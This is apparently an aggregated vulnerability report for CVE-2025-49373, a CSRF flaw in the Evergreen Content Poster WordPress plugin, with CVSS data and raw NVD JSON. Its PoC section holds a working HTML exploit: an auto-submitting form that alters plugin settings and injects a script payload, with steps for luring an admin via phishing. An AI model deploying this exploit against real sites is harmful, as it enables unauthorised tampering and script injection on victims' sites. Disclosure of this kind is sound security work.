Security Vulnerability Report
中文
CVE-2025-49373 CVSS 4.3 MEDIUM

CVE-2025-49373

Published: 2025-10-22 15:15:35
Last Modified: 2026-04-27 20:16:13
Source: [email protected]

Description

Cross-Site Request Forgery (CSRF) vulnerability in Evergreen Content Poster Evergreen Content Poster evergreen-content-poster allows Cross Site Request Forgery.This issue affects Evergreen Content Poster: from n/a through <= 1.4.5.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Evergreen Content Poster <= 1.4.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-49373: CSRF in Evergreen Content Poster WordPress Plugin (<= 1.4.5) This PoC demonstrates how an attacker can exploit the missing CSRF protection to modify the plugin's settings when an authenticated admin visits a malicious page. --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Please wait...</h1> <!-- The form below targets the Evergreen Content Poster plugin's settings endpoint. When submitted, it modifies the scheduled posting configuration. Replace TARGET_SITE_URL with the victim's WordPress site URL. --> <form id="csrf-form" action="https://TARGET_SITE_URL/wp-admin/admin.php?page=evergreen-content-poster" method="POST"> <input type="hidden" name="action" value="update_settings" /> <input type="hidden" name="ecp_interval" value="60" /> <input type="hidden" name="ecp_post_type" value="post" /> <input type="hidden" name="ecp_status" value="enabled" /> <input type="hidden" name="ecp_content" value="<script>alert('XSS via CSRF')</script>" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> </body> </html> <!-- Usage: 1. Host this HTML on an attacker-controlled server. 2. Trick an authenticated WordPress admin (with Evergreen Content Poster installed) into visiting the page (e.g., via phishing email, malicious link, or compromised site). 3. The form will auto-submit, sending a cross-site request with the admin's session cookie. 4. The plugin will process the request without CSRF token validation, executing the attacker's payload. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49373", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:35.297", "lastModified": "2026-04-27T20:16:13.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Evergreen Content Poster Evergreen Content Poster evergreen-content-poster allows Cross Site Request Forgery.This issue affects Evergreen Content Poster: from n/a through <= 1.4.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/evergreen-content-poster/vulnerability/wordpress-evergreen-content-poster-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.